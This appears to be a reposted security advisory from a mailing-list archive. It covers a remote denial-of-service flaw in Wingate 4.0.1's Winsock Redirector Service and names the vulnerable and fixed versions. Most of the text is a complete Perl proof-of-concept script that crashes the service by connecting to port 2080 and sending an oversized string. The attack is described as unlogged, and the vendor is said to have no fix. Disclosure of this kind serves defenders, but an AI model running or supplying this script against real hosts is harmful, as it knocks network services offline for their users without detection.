Wingate 4.0.1 DoS (Winsock Redirector) ------------------------------------------------------------------------ SUMMARY The Wingate engine can be disabled remotely by sending an abnormal string to the Winsock Redirector Service. The attack is not logged, and thus remote attackers can perform denial-of-service attacks on Wingate machines without being detected. DETAILS Vulnerable systems: Wingate Home/Standard/Pro 4.0.1 Prior versions are possibly vulnerable as well. Immune systems: Wingate 4.1 Beta A If the Winsock redirector service is enabled, it is possible to crash the Wingate service remotely by sending a special string to the Winsock redirector. The Wingate engine has to be restarted to resume normal operation. Exploit Code: #!/usr/bin/perl # # wgate401.pl - Wingate 4.0.1 denial-of-service # Blue Panda - [EMAIL PROTECTED] # http://bluepanda.box.sk/ # # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of concept, and # is not intended to be used for illegal purposes. I accept # no responsibility for damage incurred by the use of it. # ---------------------------------------------------------- # # Causes all Wingate services to become unavailable until the Wingate Engine # is restarted. The Winsock Redirector Service must be enabled in order for # this to work. Tested on the evaluation version of Wingate Pro 4.0.1. # use IO::Socket; $host = "host.com"; $port = "2080"; $sleepfor = 1; print "Wingate 4.0.1 denial-of-service Blue Panda - bluepanda\@dwarf.box.sk http://bluepanda.box.sk/ ---------------------------------------------------------- Disclaimer: this file is intended as proof of concept, and is not intended to be used for illegal purposes. I accept no responsibility for damage incurred by the use of it. ---------------------------------------------------------- Causes all Wingate services to become unavailable until the Wingate Engine is restarted. The Winsock Redirector Service must be enabled in order for this to work.\n\n"; # Connect to the Winsock Redirector Service. print "Connecting to $host:$port..."; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n"; print "done.\n"; # Send some characters to the Winsock Redirector Service. $buffer = "a" x 1079; print $socket "$buffer"; # Wait a few seconds. $counter = 0; print "Sleeping for $sleepfor seconds."; while($counter < $sleepfor) { sleep(1); print "."; $counter += 1; } print "\n"; # Close the connection. The Winsock Redirector Service should now be # disabled. close($socket); # Connect once more to the Winsock Redirector Service. This will disable all # other services. print "Connecting to $host:$port..."; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n"; print "done.\n"; # Finished. close($socket); Vendor Status: Vendor has been notified. No solution is currently available. -- Eko Sulistiono MIKRODATA & AntiVirus Media Web: http://www.mikrodata.co.id/ WAP: http://www.mikrodata.co.id/wap/index.wml This message contains no viruses. Guaranteed by AVP. ------------------------------------------------------------------------ Forum Komunikasi Penulis-Pembaca MIKRODATA (FKPPM) Informasi : http:[EMAIL PROTECTED] Arsip : http://www.mail-archive.com/forum%40mikrodata.co.id/ WAP : http://mikrodata.co.id/wap/index.wml Milis ini menjadi kontribusi beberapa rubrik yang diasuh tim MIKRODATA. Termasuk rubrik-rubrik yang ada di media lain. Memakai, Menyebarluaskan, dan Memperbanyak software bajakan adalah tindakan kriminal. Please check with the latest AVP update before you ask about virus: ftp://mikrodata.co.id/avirus_&_security/AntiViral_Toolkit_Pro/avp30.zip
